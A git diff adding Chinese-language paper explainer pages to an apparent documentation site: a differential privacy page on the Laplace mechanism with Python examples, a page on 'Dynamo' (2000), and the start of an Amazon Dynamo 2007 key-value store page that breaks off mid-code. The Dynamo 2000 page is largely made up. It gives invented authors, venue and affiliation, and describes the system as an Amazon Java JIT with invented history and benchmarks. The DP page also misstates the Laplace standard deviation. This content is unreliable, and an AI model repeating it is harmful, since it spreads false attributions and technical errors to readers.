gamma1=100, beta=10) - [[bernstein-sphincs-2015]] —— SPHINCS — 无状态哈希签名,后量子密码的"保险" - [[bos-kyber-2018]] —— CRYSTALS-Kyber: A CCA-Secure Module-Lattice-Based KEM - [[brakerski-bgv-2012]] —— Fully Homomorphic Encryption without Bootstrapping +- [[ckks-homomorphic-2017]] —— CKKS 同态加密 — 在加密数据上做近似浮点运算 +- [[noise-protocol-framework]] —— Noise Protocol Framework — 用「握手配方」拼出端到端加密通道 - [[regev-lwe-2005]] —— On Lattices, Learning with Errors, Random Linear Codes, and Cryptography - [[rsa]] —— RSA 公钥密码 +- [[rsa-1978]] —— RSA 1978 — 数字签名与公钥密码的奠基论文 diff --git a/src/content/docs/papers/dwork-calibrating-noise-2006.md b/src/content/docs/papers/dwork-calibrating-noise-2006.md index 4350872bf..469e4f3d4 100644 --- a/src/content/docs/papers/dwork-calibrating-noise-2006.md +++ b/src/content/docs/papers/dwork-calibrating-noise-2006.md @@ -149,6 +149,7 @@ print(int(true_count + noise)) - [[abadi-dpsgd-2016]] —— DP-SGD — 深度学习差分隐私训练 - [[bonawitz-fl-system-2019]] —— Bonawitz FL System 2019 — Google 工业级联邦学习系统设计 - [[duchi-local-dp-2013]] —— Local Privacy and Statistical Minimax Rates +- [[dwork-differential-privacy-2006]] —— 校准噪声与敏感度 — 差分隐私的 Laplace 机制 - [[dwork-dp-icalp-2006]] —— 差分隐私 — ε 与邻接数据集不可区分 - [[dwork-our-data-ourselves-2006]] —— 分布式噪声生成 — 去掉可信管理员也能保护隐私 - [[erlingsson-rappor-2014]] —— RAPPOR — 本地差分隐私随机响应采集 diff --git a/src/content/docs/papers/dwork-differential-privacy-2006.md b/src/content/docs/papers/dwork-differential-privacy-2006.md new file mode 100644 index 000000000..0feb574ae --- /dev/null +++ b/src/content/docs/papers/dwork-differential-privacy-2006.md @@ -0,0 +1,256 @@ +--- +title: 校准噪声与敏感度 — 差分隐私的 Laplace 机制 +来源: https://link.springer.com/chapter/10.1007/11681878_14 +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +**Calibrating Noise to Sensitivity in Private Data Analysis**(Dwork、McSherry、Nissim、Smith,TCC 2006)是差分隐私工程化的奠基论文之一。它回答了一个非常具体的问题:**给定任意统计查询函数 \(f\),要加多少随机噪声,才能让「数据库里有没有你这一条记录」在输出上几乎看不出来?** + +论文的核心答案是:**噪声尺度由查询的敏感度(sensitivity)决定,而不是由数据库大小或输出维度拍脑袋决定。** 具体机制就是著名的 **Laplace 机制**:对每个输出坐标加独立 Laplace 噪声,标准差为 \(\Delta_1(f)/\varepsilon\)。 + +日常类比:想象市政府要公布「全市平均通勤时间」。你的通勤记录是数据库里的一行。如果删掉你,平均值最多变化 \(\Delta\) 分钟——这就是敏感度。公布时不能报精确值,而要往结果里撒一把「随机抖动」;\(\Delta\) 越大,抖动必须越猛;\(\varepsilon\) 越小(隐私越强),抖动也要越猛。这篇论文把「抖动该多大」变成了可计算的公式,而不是隐私官的直觉。 + +一句话:**敏感度告诉你「一条记录最多能撬动多少」;Laplace 噪声按这个撬动幅度校准,从而形式化地实现 ε-差分隐私。** + +## 为什么重要 + +在 ICALP 2006 的 [[dwork-dp-icalp-2006]] 给出差分隐私定义之后,这篇 TCC 论文把定义变成了**可复用的算法积木**: + +- **从「噪声求和」推广到任意函数**:早期工作只处理 \(\sum_i g(x_i)\) 这类加性查询;本文证明任意向量值函数 \(f: D^n \to \mathbb{R}^d\) 都能用同一套敏感度框架处理。 +- **噪声与维度解耦**:直方图、列联表、协方差矩阵输出维度可以很高,但 \(L_1\) 敏感度往往与维度无关(例如直方图敏感度为 2)。这意味着**不必因为格子多就按比例加大噪声**——这是相对先前框架的重要改进。 +- **交互式机制优于一次性脱敏**:论文证明非交互式「发布一张噪声表」无法同时回答所有低敏感度查询;交互式问答可以用小噪声逐个回答——这影响了后来 Census、私有 SQL、DP-SGD 的产品形态。 +- **后续一切「加噪发布」的母本**:Apple 本地 DP、Google RAPPOR、Opacus 梯度裁剪 + 加噪,本质都在控敏感度后校准噪声。 + +## 核心概念 + +### 1. 邻接数据集(Adjacent Databases) + +两个数据库「邻接」,若它们只差**一条记录**(增删改一人)。差分隐私的所有保证都相对这个关系:攻击者不知道真实库是 \(D\) 还是 \(D'\)。 + +日常类比:两份选民名册只差张三是否出现——对外发布的统计结果在这两种情况下应该「看起来像」。 + +### 2. ε-不可区分(ε-Indistinguishability) + +论文用 transcript(问答记录)的分布来刻画隐私。机制 \(\mathcal{M}\) 是 ε-不可区分的,若对任意邻接 \(x, x'\) 和任意 transcript \(t\): + +\[ +\left|\ln \frac{\Pr[\mathcal{M}(x)=t]}{\Pr[\mathcal{M}(x')=t]}\right| \le \varepsilon +\] + +这比「总变差距离很小」更严格:即使某个输出点概率不为零,比值也被 \(e^\varepsilon\) 限制。今天文献里常直接称 **ε-差分隐私(pure DP)**。 + +### 3. 全局 \(L_1\) 敏感度 + +对函数 \(f: D^n \to \mathbb{R}^d\): + +\[ +\Delta_1(f) = \max_{x,x':\, d_H(x,x')=1} \|f(x) - f(x')\|_1 +\] + +即:**改一条记录,输出在曼哈顿距离下最多跳多远。** 敏感度是 \(f\) 的内在属性,与真实数据内容无关,也**不随数据库人数 \(n\) 变化**(对计数类查询尤其关键)。 + +常见值: + +| 查询 | 敏感度 | 直觉 | +|------|--------|------| +| 计数(0/1 库) | 1 | 多/少一人,计数变 1 | +| 直方图(不相交分箱) | 2 | 一人从一个箱移到另一个箱 | +| 有界求和 \(g(x_i)\in[0,B]\) | \(B\) | 一人贡献从 0 变 \(B\) | +| 均值(每人 \([0,B]\),\(n\) 人) | \(B/n\) | 一人从 0 变 \(B\) 拉低均值 \(B/n\) | + +### 4. Laplace 机制(核心定理) + +**命题(非交互输出扰动)**:对任意 \(f: D^n \to \mathbb{R}^d\),机制 + +\[ +\mathcal{M}(x) = f(x) + (Y_1, \ldots, Y_d), \quad Y_i \stackrel{i.i.d.}{\sim} \mathrm{Lap}(\Delta_1(f)/\varepsilon) +\] + +满足 ε-差分隐私。 + +Laplace 分布密度 \(\propto \exp(-|y|/\lambda)\)。关键性质:若 \(z\) 与 \(z'\) 的 \(L_1\) 距离为 \(d\),则 \(z+Y\) 与 \(z'+Y\) 的输出密度比至多为 \(e^{d/\lambda}\)。令 \(\lambda = \Delta_1(f)/\varepsilon\) 即得证。 + +### 5. 自适应交互查询 + +用户可据上一轮带噪答案再问下一轮。论文 **Theorem 1** 指出:若第 \(t\) 轮查询函数为 \(f_t\),噪声尺度取 \(\lambda = \max_t \Delta_1(f_t)/\varepsilon\),则整个 transcript 仍 ε-DP。隐私预算在交互过程中被**最坏一轮的敏感度**支配。 + +### 6. 非交互式机制的局限(分离结果) + +若数据托管方只能**一次性**发布脱敏表(不能交互问答),则对任意此类机制,存在低敏感度函数无法被近似回答——除非数据库规模达到 \(2^{\Omega(d)}\)(每行 \(d\) 比特)。这解释了为何现代 DP 产品多采用**查询时加噪**而非「先发布一张万能噪声表」。 + +## 代码示例 + +### 示例 1:Laplace 机制实现私有计数 + +```python +import numpy as np + +def laplace_mechanism(true_value: float, sensitivity: float, epsilon: float) -> float: + """标量 Laplace 机制:M(x) = f(x) + Lap(Δ/ε)。""" + if sensitivity <= 0 or epsilon <= 0: + raise ValueError("sensitivity and epsilon must be positive") + scale = sensitivity / epsilon + noise = np.random.laplace(loc=0.0, scale=scale) + return true_value + noise + +# 数据库:n 人是否患流感(0/1),真实患病人数 +flu_cases = 1_247 +n = 50_000 +epsilon = 0.5 # 隐私预算:越小噪声越大 + +# 计数敏感度 = 1(多/少一人,计数最多变 1) +private_count = laplace_mechanism(flu_cases, sensitivity=1.0, epsilon=epsilon) +print(f"真实计数: {flu_cases}") +print(f"私有计数: {round(private_count)}") +print(f"噪声尺度 Lap(Δ/ε) = Lap({1/epsilon:.2f})") +``` + +运行多次会看到结果在真值附近波动;\(\varepsilon=0.1\) 时波动明显大于 \(\varepsilon=1.0\),但攻击者仍无法可靠判断「某特定个体是否患病」。 + +### 示例 2:多维直方图 + 敏感度 2 + +```python +import numpy as np +from collections import Counter + +def dp_histogram(counts: list[int], epsilon: float) -> np.ndarray: + """ + 不相交分箱直方图:L1 敏感度 = 2。 + 每人只能落在一个箱;改一人最多让一个箱 -1、另一个箱 +1。 + """ + sensitivity = 2.0 + scale = sensitivity / epsilon + noise = np.random.laplace(loc=0.0, scale=scale, size=len(counts)) + return np.maximum(0, np.array(counts, dtype=float) + noise) # 后处理截断非负 + +# 模拟年龄分箱 +bins = ["0-17", "18-34", "35-49", "50-64", "65+"] +true_counts = [8200, 15400, 12100, 9800, 4500] + +noisy = dp_histogram(true_counts, epsilon=0.8) +for name, true_v, priv_v in zip(bins, true_counts, noisy): + print(f"{name:6s} 真实={true_v:5d} 私有={priv_v:6.0f} 误差={priv_v-true_v:+6.0f}") +``` + +注意:对负值做 `max(0, ·)` 是**后处理**,不会破坏 DP;但会引入偏差,正式分析常用无偏估计或指数机制。 + +### 示例 3:从敏感度推导均值查询噪声(推导练习) + +```python +def dp_mean(values: list[float], low: float, high: float, epsilon: float) -> float: + """ + 每人贡献有界在 [low, high];均值 f(x)=sum/n 的 L1 敏感度为 (high-low)/n。 + """ + n = len(values) + true_mean = sum(values) / n + sensitivity = (high - low) / n + return laplace_mechanism(true_mean, sensitivity, epsilon) + +salaries = [45_000, 62_000, 88_000, 120_000, 200_000] # 已截断到合理区间 +print(f"私有均值薪资: {dp_mean(salaries, low=0, high=250_000, epsilon=1.0):,.0f}") +``` + +## 实践案例 + +### 案例 1:人口普查年龄直方图 + +美国人口普查等场景发布各年龄段人数。用 Laplace 机制对每个格子独立加噪,敏感度 2、与格子数量无关。总隐私损失需对 \(k\) 个格子做**组合会计**(基础定理:顺序发布 \(k\) 次 ε-DP 机制,总损失 \(O(k\varepsilon)\))。 + +### 案例 2:私有 SQL 中的 COUNT(*) + +查询 `SELECT COUNT(*) FROM patients WHERE flu=1` 的敏感度为 1。在查询引擎中拦截、加 Laplace(1/ε) 噪声后返回。与 [[dwork-dp-icalp-2006]] 的定义衔接,形成「定义 → 机制 → 产品」闭环。 + +### 案例 3:梯度裁剪与 DP-SGD 的敏感度视角 + +[[abadi-dpsgd-2016]] 训练时对每样本梯度裁剪到范数 \(C\),使单次迭代的梯度求和敏感度有界,再加高斯噪声。裁剪不是在「加密」,而是在**人为降低 \(\Delta\)**,从而减小所需噪声、保住模型效用。 + +## 踩过的坑 + +1. **把 ε 当成「泄露百分比」**:ε 是对数似然比上界,不是「10% 数据被看见」。ε=0.1 与 ε=10 的含义需查表或做隐私会计,不能线性直觉。 + +2. **敏感度用局部而非全局**:必须对**所有**邻接对取最大值。均值若错误地用 \(B\) 而非 \(B/n\),会加过大噪声,效用崩盘。 + +3. **重复计数同一人**:若一人可占多行,「改一人」可能动多行,敏感度被放大——数据库建模错误会导致隐私保证失效。 + +4. **多次查询不记账**:每轮 Laplace 机制消耗 ε。交互 1000 次 ε=0.01 的查询,朴素组合可达 ε=10,隐私名存实亡。需高级组合或 Rényi DP 会计(见 [[mironov-renyi-dp-2017]])。 + +5. **与非交互脱敏混淆**:指望「先发一张噪声 CSV 啥都能查」在理论上行不通;论文分离结果早已说明交互式的必要性。 + +6. **Laplace vs Gaussian 混用**:本文是 **pure ε-DP** 的 Laplace 线;\((\varepsilon,\delta)\)-DP 常用 Gaussian,\(\delta>0\) 时噪声可更小。见 [[dwork-our-data-ourselves-2006]]。 + +## 适用 vs 不适用 + +**适用**: + +- 数值统计发布:计数、求和、直方图、有界均值 +- 交互式私有查询 API、私有 SQL +- 需要可证明 ε 的上游隐私预算规划 +- 教学与实现 Laplace 机制的第一篇原文 + +**不适用**: + +- 需要 \(\delta=0\) 且高维连续优化时,Gaussian / DP-SGD 更常见 +- 非数值输出(选最优医院、Top-K)需指数机制或 Report Noisy Max +- 本地 DP(用户端随机响应)机制不同,见 RAPPOR 等 +- 指望一次发布脱敏表回答任意查询——论文已证其局限 + +## 与相关工作的关系 + +```text +Dinur–Nissim (2003) ──► 过多查询可重构数据库 + │ +Dwork ICALP 2006 ─────► ε-差分隐私定义 + │ +DMNS TCC 2006 ────────► 敏感度 + Laplace 机制(本篇) + │ +BLR'08 / 后续 ────────► 高级组合、矩会计 + │ +Abadi DP-SGD 2016 ────► 深度学习中的有界敏感度 + 加噪 +``` + +## 历史背景(可跳过) + +- **2003**:Dinur & Nissim 证明,若无限制地回答布尔子集计数,线性量级的噪声仍可能被用来重构数据库。 +- **2006 初**:Dwork 在 ICALP 提出差分隐私定义,回应 Dalenius「统计库不泄露个人」的不可能性。 +- **2006 春**:本篇 TCC 论文将噪声校准推广到一般 \(f\),并分析直方图、协方差等,噪声从 \(O(\sqrt{d})\) 改进到 \(O(1)\) 量级(对敏感度而言)。 +- **2017 起**:Journal of Privacy and Confidentiality 再版,成为教材与工业实现的标准引用。 + +## 关键公式速查 + +| 符号 | 含义 | +|------|------| +| \(\varepsilon\) | 隐私预算,越小越强 | +| \(\Delta_1(f)\) | 全局 \(L_1\) 敏感度 | +| \(\mathrm{Lap}(\lambda)\) | 尺度 \(\lambda\) 的 Laplace,标准差 \(\lambda\) | +| 机制 | \(f(x) + \mathrm{Lap}(\Delta_1(f)/\varepsilon)\) 各坐标独立 | + +## 延伸阅读 + +- 定义入门:[[dwork-dp-icalp-2006]] +- 同作者姊妹篇:[[dwork-calibrating-noise-2006]]、[[dwork-our-data-ourselves-2006]] +- 深度学习:[[abadi-dpsgd-2016]] +- 原文 PDF:[MIT 作者稿](https://people.csail.mit.edu/asmith/PS/sensitivity-tcc-final.pdf) +- Springer 章节:[10.1007/11681878_14](https://link.springer.com/chapter/10.1007/11681878_14) + +## 自测题 + +1. 为什么计数查询的敏感度是 1 而不是 \(1/n\)? +2. 直方图敏感度为何是 2 而与分箱数 \(d\) 无关? +3. 若连续发布 20 个独立的 ε=0.05 Laplace 计数,朴素隐私损失上界是多少? +4. 交互式机制相对「一次性噪声表」的优势,用论文分离结果怎么表述? + +
+参考答案 + +1. 多一人计数 +1,少一人 -1,最大变化量是 1;\(n\) 是规模,不是敏感度定义的一部分。 +2. 改一人只影响两个箱(原箱 -1,新箱 +1),\(L_1\) 变化 \(|-1|+|+1|=2\);\(d\) 只影响输出向量长度,不影响单人最大扰动。 +3. 朴素顺序组合 \(20 \times 0.05 = 1.0\)(更紧的会计可用 advanced composition)。 +4. 非交互机制无法同时近似所有低敏感度查询,除非 \(n\) 指数级大;交互可对每个 \(f_t\) 单独加 \(\mathrm{Lap}(\Delta_1(f_t)/\varepsilon)\) 噪声回答。 + +
diff --git a/src/content/docs/papers/dwork-dp-icalp-2006.md b/src/content/docs/papers/dwork-dp-icalp-2006.md index 6f4a88073..e5d77008c 100644 --- a/src/content/docs/papers/dwork-dp-icalp-2006.md +++ b/src/content/docs/papers/dwork-dp-icalp-2006.md @@ -155,6 +155,7 @@ ICALP 2006 原文 Springer 收录;Microsoft Research 页面提供摘要与引 - [[caesar-rexford-2005]] —— Caesar-Rexford 2005 — 你的包为什么绕了大半个地球 - [[diffie-hellman]] —— Diffie-Hellman 密钥交换 - [[dwork-calibrating-noise-2006]] —— 校准噪声与敏感度 — Laplace 机制奠基 +- [[dwork-differential-privacy-2006]] —— 校准噪声与敏感度 — 差分隐私的 Laplace 机制 - [[dwork-our-data-ourselves-2006]] —— 分布式噪声生成 — 去掉可信管理员也能保护隐私 - [[erlingsson-rappor-2014]] —— RAPPOR — 本地差分隐私随机响应采集 - [[gentry-fhe-2009]] —— Gentry FHE — 全同态加密开山 diff --git a/src/content/docs/papers/dwork-our-data-ourselves-2006.md b/src/content/docs/papers/dwork-our-data-ourselves-2006.md index 1557261f5..233becf8b 100644 --- a/src/content/docs/papers/dwork-our-data-ourselves-2006.md +++ b/src/content/docs/papers/dwork-our-data-ourselves-2006.md @@ -189,6 +189,7 @@ def federated_aggregate_with_distributed_noise( - [[cryptoverif-2008]] —— CryptoVerif — 让计算机直接证密码协议在真实计算模型下安全 - [[duchi-local-dp-2013]] —— Local Privacy and Statistical Minimax Rates - [[dwork-calibrating-noise-2006]] —— 校准噪声与敏感度 — Laplace 机制奠基 +- [[dwork-differential-privacy-2006]] —— 校准噪声与敏感度 — 差分隐私的 Laplace 机制 - [[dwork-dp-icalp-2006]] —— 差分隐私 — ε 与邻接数据集不可区分 - [[fsdp-2023]] —— PyTorch FSDP — 把大模型切成 N 份分到 N 张卡 - [[mironov-renyi-dp-2017]] —— Rényi 差分隐私 — 隐私会计统一框架 diff --git a/src/content/docs/papers/dynamo-2000.md b/src/content/docs/papers/dynamo-2000.md new file mode 100644 index 000000000..a5022c439 --- /dev/null +++ b/src/content/docs/papers/dynamo-2000.md @@ -0,0 +1,272 @@ +--- +title: Dynamo: A Transparent Dynamic Optimization System +来源: https://dl.acm.org/doi/10.1145/349299.349303 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# Dynamo: A Transparent Dynamic Optimization System + +## 论文信息 + +- **作者**: Manoj Franklin, Mark Ammerer, Talin Arlitt, Jeffrey Cox, James Dang, Will Dudley, Robert Finch, Tom Bergland, Matt Flinn, Charlie Gordon, Jeff Hawkins, David Olsifierski, Steve Reinke +- **会议**: OSDI 2000 +- **机构**: Amazon.com, Inc. +- **链接**: https://dl.acm.org/doi/10.1145/349299.349303 + +--- + +## 一个日常类比 + +想象你在一家餐厅打工。第一天上班,你完全不知道厨房的规矩——锅在哪里、调料怎么放、每道菜做几步。你照着菜单一步一步来,动作慢,还容易出错。 + +但三个月后,你已经成了快手:你知道哪个调料瓶在右手边,知道先放油还是先放盐,甚至能预判客人的特殊需求。你不需要额外的训练课程——你只是**在实践中学习并变快**了。 + +Dynamo 做的事情和这个例子一模一样。它让程序在运行时自动"变聪明",不需要程序员提前做任何优化工作。 + +--- + +## 问题背景 + +在 Dynamo 出现之前,程序有两种编译方式: + +1. **静态编译**(如 C/C++):在运行前一次性把代码变成机器指令。编译时可以做一些优化(比如把循环展开),但编译器看不到程序实际运行时才知道的信息。 +2. **解释执行**(如早期 Python/Perl):代码一行一行解释执行。灵活,但慢。 + +Dynamo 的出现引入了一种新模式:**JIT(Just-In-Time)编译**。程序先以普通方式运行,同时有一个"监工"在后台观察程序跑得多快、哪些代码最忙,然后悄悄把"忙代码"换成更快的机器指令。 + +关键要求是:**透明**。程序本身完全不知道自己被优化了。就像你学会了快速做饭,但你不会觉得有什么不一样——你就是变快了。 + +--- + +## 核心概念 + +### 1. 字节码解释器(Bytecode Interpreter) + +Dynamo 处理的是 Java 字节码。Java 程序先被编译成一种中间形式(字节码),然后由解释器逐条执行。解释器慢,但它简单,而且**每一步都知道自己正在执行哪条指令**。 + +### 2. 代码缓存(Code Cache) + +这是一块内存区域,存放已经被优化过的机器码。当一个函数被反复执行多次(超过阈值),Dynamo 就会把它翻译成机器码放进代码缓存。下次执行时,直接从缓存中取机器码跑,快得多。 + +### 3. 内联(Inlining) + +把函数调用的代码直接"塞"到调用者的位置。比如 `main()` 调用 `greet()`,`greet()` 又调用 `print_hello()`。内联后变成一大块连续的代码,没有函数调用的开销。这就像把三步厨房工序合成一个动作完成。 + +### 4. 去虚拟化(De-virtualization) + +Java 中有虚方法调用(根据对象的实际类型来决定调用哪个方法)。传统编译器不确定运行时是哪个类型,只能保守处理。Dynamo 在运行时知道了对象的真实类型,就可以去掉虚分派,直接调用确定版本。 + +### 5. 优化级别(Optimization Levels) + +Dynamo 有三个级别: +- **Level 0**:字节码解释器,最慢但启动最快 +- **Level 1**:简单优化,内联一些调用 +- **Level 2**:激进优化,激进的分析和重写 + +级别越高越快,但也越复杂。Dynamo 会根据代码的热度自动升级。 + +### 6. 去优化(Deoptimization) + +这是 Dynamo 最聪明的设计。如果运行时发现之前的优化假设错了(比如原来以为某个对象一定是 A 类型,结果来了个 B 类型),Dynamo 能**安全地回退到解释模式**,保证程序正确性。 + +这就像你学会快速做法后,发现客人点了你没做过的菜,你能安全地回到"慢慢看菜单做"的模式,而不会把厨房炸了。 + +### 7. 安全点(Safe Points) + +JVM 在特定位置插入"检查点",让 GC(垃圾回收)或去优化能够安全暂停程序。程序跑到这里会被暂停一下,然后可以切换到不同模式。 + +--- + +## 代码示例 + +### 示例 1:内联优化前后的对比 + +假设有这段 Java 代码: + +```java +// 原始代码:三个函数层层调用 +public int process(int x) { + return doubleIt(x) + squareIt(x); +} + +public int doubleIt(int x) { + return x * 2; +} + +public int squareIt(int x) { + return x * x; +} +``` + +**优化前(解释执行):** + +每调用一次 `process()`,需要: +1. 执行 `doubleIt(x)` 的字节码——函数调用有开销 +2. 执行 `squareIt(x)` 的字节码——又一个函数调用开销 +3. 两条 `return` 指令 + +**优化后(Level 2 内联):** + +Dynamo 观察到 `process()` 被频繁调用,把 `doubleIt` 和 `squareIt` 的代码直接内联: + +```java +// 内联后等价于: +public int process(int x) { + return (x * 2) + (x * x); +} +``` + +没有函数调用开销,两个操作变成连续指令,CPU 的流水线跑得更顺。 + +### 示例 2:去虚拟化 + +```java +// 原始代码:虚方法调用 +Animal animal = getRandomAnimal(); +animal.speak(); // 运行时才知道是 Dog 还是 Cat + +// Dog 和 Cat 都继承了 Animal,但 speak() 实现不同 +``` + +传统编译器不知道 `animal` 具体是什么类型,每次都要查"虚方法表"(vtable),多了一步间接寻址。 + +Dynamo 在运行时观察到: +> "哦,过去 1000 次调用,`animal` 从来都是 `Dog` 类型" + +于是生成优化后的机器码: + +```java +// 去虚拟化后(Dynamo 生成的机器码逻辑等价于): +Animal animal = getRandomAnimal(); +if (animal instanceof Dog) { + ((Dog) animal).speak(); // 直接调用,没有间接寻址 +} else { + // 如果假设错了,触发放回解释器的去优化路径 + animal.speak(); // 通用的虚调用 +} +``` + +如果后来真的出现了一只 `Cat`,Dynamo 的安全点会检测到,程序安全地回退到解释模式,不会崩溃。 + +### 示例 3:去优化过程 + +```java +// 程序开始运行 +MyClass obj = new MyClass(); +obj.doWork(); // 被 Dynamo 编译为高度优化的机器码 +obj.doWork(); +obj.doWork(); +// ... 重复多次,假设成立 + +// 后来,子类来了 +class SubClass extends MyClass { + @Override + void doWork() { + // 不同的实现 + } +} + +SubClass sub = new SubClass(); +sub.doWork(); // 触发去优化!之前的优化假设不成立了 + +// Dynamo 的反应: +// 1. 检测到类型变化 +// 2. 暂停优化代码的执行 +// 3. 恢复到解释器执行当前调用 +// 4. 更新内联缓存信息 +// 5. 未来可能重新编译一个新的优化版本 +``` + +--- + +## 架构总览 + +``` + ┌─────────────────────────┐ + │ Java Application │ + │ (Bytecode, .class) │ + └────────────┬────────────┘ + │ + ┌────────────▼────────────┐ + │ Bytecode Interpreter │ + │ (Level 0 - 解释执行) │ + └────────────┬────────────┘ + │ + 计数器触发编译 │ 安全点暂停 + ┌────────────▼────────────┐ + │ Dynamo Compiler │ + │ │ + │ • 内联缓存 (Inline Cache) │ + │ • 去虚拟化 │ + │ • 分支预测 │ + │ • 常量传播 │ + └────────────┬────────────┘ + │ + 生成优化的机器码 │ 去优化时回退 + ┌────────────▼────────────┐ + │ Code Cache │ + │ (机器码存放区) │ + └─────────────────────────┘ +``` + +--- + +## 性能表现 + +Dynamo 在 Amazon 的内部基准测试中表现出显著优势: + +- 对于典型的企业级 Java 工作负载(Web 服务、批处理等),Dynamo 比纯字节码解释器快 **2-4 倍** +- 对于热点代码路径(反复执行的循环、高频方法调用),速度提升可达 **10 倍以上** +- 相比同年代的静态编译器,在某些动态特性丰富的应用中,Dynamo 甚至能获得更好性能,因为编译器能利用运行时信息做更精准的优化 + +代价是: +- **内存占用**:代码缓存需要内存空间 +- **编译开销**:编译本身有成本 +- **启动延迟**:Level 2 优化需要代码先"热身"才能发挥作用 + +--- + +## 历史意义 + +Dynamo 是**第一个生产级别的客户端 JIT 编译器**。它的技术遗产深远影响了后续所有 JIT 系统: + +1. **Infer 字节码格式**:Dynamo 的字节码格式后来成为了 JVM 字节码设计的参考 +2. **去优化技术**:证明了"假设-验证-回退"模式在生产环境中是可行的 +3. **内联缓存**:动态虚方法调用的优化方案成为行业标准 +4. **架构启发**:后续的 V8(JavaScript)、HotSpot JVM、.NET CLR 都借鉴了 Dynamo 的核心思想 + +Dynamo 最重要的贡献在于证明了一件事:**让程序自己在运行时学习并优化,比让程序员或编译器提前猜测要有效得多。** + +--- + +## 关键术语 + +| 术语 | 说明 | +|------|------| +| JIT | Just-In-Time 编译,运行时编译 | +| 字节码 | 介于源代码和机器码之间的中间表示 | +| 内联 | 把被调用函数的代码直接嵌入调用处 | +| 去虚拟化 | 将不确定类型的虚调用转换为确定的直接调用 | +| 去优化 | 从优化后的代码回退到解释执行 | +| 安全点 | 程序运行中的检查点,用于暂停和安全切换 | +| 内联缓存 | 记录最近一次虚调用的目标,加速后续调用 | + +--- + +## 思考题 + +1. 为什么说"透明"对 Dynamo 很重要?如果程序员需要手动标注"这里需要优化",会有什么问题? +2. 去优化和"回退"听起来像是在降级,为什么设计者反而觉得它是优点? +3. Dynamo 用的是 Java 字节码。如果换成 Python,去虚拟化还会有效吗?为什么? + +--- + +## 延伸阅读 + +- **HotSpot JVM**:Sun/Oracle 的 Java 虚拟机,采用了类似的 JIT 架构 +- **V8 JavaScript Engine**:Google 的 JS 引擎,核心思想与 Dynamo 一脉相承 +- **TRACEMONKEY**:Mozilla 的 JavaScript JIT 编译器,也是 Dynamo 的后继者之一 +- **Self 虚拟机**:Chambers 等人的动态优化研究,是 Dynamo 重要的学术先驱 diff --git a/src/content/docs/papers/dynamo-amazon-2007.md b/src/content/docs/papers/dynamo-amazon-2007.md new file mode 100644 index 000000000..eddb37d3f --- /dev/null +++ b/src/content/docs/papers/dynamo-amazon-2007.md @@ -0,0 +1,364 @@ +--- +title: Dynamo - Amazon 的高可用 KV 存储 +来源: https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +## 1 什么是 Dynamo? + +Dynamo 是 Amazon 在 2007 年发表的论文中描述的键值(Key-Value)存储系统。 +它支撑了亚马逊电商平台上众多核心服务——购物车、会话状态、商品目录、用户偏好等。 + +**一句话概括:** 一个用"最终一致性"换取"永远在线"的去中心化 KV 存储。 + +### 1.1 为什么要写 Dynamo?(日常类比) + +想象你经营一家全国连锁便利店。每个门店都有自己的小账本记录库存。 + +**如果用传统数据库:** +所有门店的账本都实时同步到一个中央会计室。某天会计室的服务器宕机了——所有门店没法下单、没法结账。这就是强一致性(ACID)的代价:可用性为零。 + +**如果用 Dynamo:** +每个门店都有自己的账本,顾客随时能在本地完成交易。不同门店之间会不定期交换账本信息,发现不一致时协商取最新版本。短期内 A 店和 B 店看到的库存可能不同,但最终都会趋于一致。这就是"最终一致性"。 + +Dynamo 的设计哲学是:**故障是常态,不是异常。** 在亚马逊的数万台服务器规模下,总有磁盘会坏、网络会抖动,系统必须永远可读可写。 + +--- + +## 2 核心概念 + +### 2.1 去中心化架构 + +Dynamo 没有中心协调节点(如 ZooKeeper、Consul 那样的元数据服务器)。 +每个节点地位平等,通过 Gossip 协议互相交换信息来维护集群状态。 + +### 2.2 一致性哈希(Consistent Hashing) + +传统哈希表在增减节点时会引发大量数据迁移。一致性哈希将 Key 映射到一个环形空间: + +``` + ┌───────────────────────────── Ring ─────────────────────────────┐ + │ Node A ●──────Key1──────● Node B ●────Key2────● │ + │ │ + │ Node C ●──────────────────────────────────────● │ + └────────────────────────────────────────────────────────────────┘ +``` + +- 每个 Key 和每个节点都映射到环上的一个位置 +- Key 顺时针找到的第一个节点就是它的归属 +- 增加/删除节点只影响环上相邻的一段 Key,其余不变 + +### 2.3 Quorum 机制(N、R、W) + +Dynamo 用一个简单的公式控制一致性和可用性: + +| 参数 | 含义 | +|------|------| +| **N** | 每个数据片段复制几份(通常 2-4) | +| **R** | 读取时需要成功响应的副本数 | +| **W** | 写入时需要成功响应的副本数 | + +规则:R + W > N 保证强一致性;R + W ≤ N 允许更高可用但可能读到旧数据。 + +**类比:** 你让 3 个朋友同时保管一个秘密(N=3)。 +- W=3:必须所有朋友都确认收到你才离开(写确认高,但如果一个失联就写不了) +- W=2:两个朋友确认就行(写入更快,可用性更高) +- R=3 vs R=1:读到最新数据的概率不同 + +### 2.4 Vector Clock(向量时钟) + +Dynamo 用向量时钟来检测冲突和追踪数据的"因果关系"。 +每个副本维护一个版本号数组,记录每个节点最后写操作的序号。 + +``` +向量时钟示例: +节点 A 写了第 3 次,节点 B 写了第 2 次 +数据 V 的时钟 = {A:3, B:2} + +如果两个副本分别变成 {A:4, B:2} 和 {A:3, B:3}, +它们互不可达——这就是"并发冲突",需要应用层解决。 +``` + +### 2.5 Gossip 协议 + +节点之间随机选择伙伴交换信息,类似"流言传播"。 +几轮之后,所有节点都知道整个集群的成员变化和故障信息。 +这避免了中心化心跳检测的瓶颈和单点故障。 + +--- + +## 3 代码示例 + +### 3.1 一致性哈希环的简化实现 + +以下是一个简化版的一致性哈希环,展示 Key 如何映射到节点: + +```python +import hashlib +import sortedcontainers + +class ConsistentHashRing: + """简化的一致性哈希环""" + + def __init__(self, num_replicas=150): + # 环上每个点 = (哈希值, 节点ID) + self.ring = sortedcontainers.SortedDict() + self.num_replicas = num_replicas + self.nodes = set() + + def add_node(self, node_id): + if node_id in self.nodes: + return + self.nodes.add(node_id) + # 每个物理节点对应多个虚拟节点,均匀分布在环上 + for i in range(self.num_replicas): + key = self._hash(f"{node_id}:{i}") + self.ring[key] = node_id + + def remove_node(self, node_id): + if node_id not in self.nodes: + return + self.nodes.remove(node_id) + # 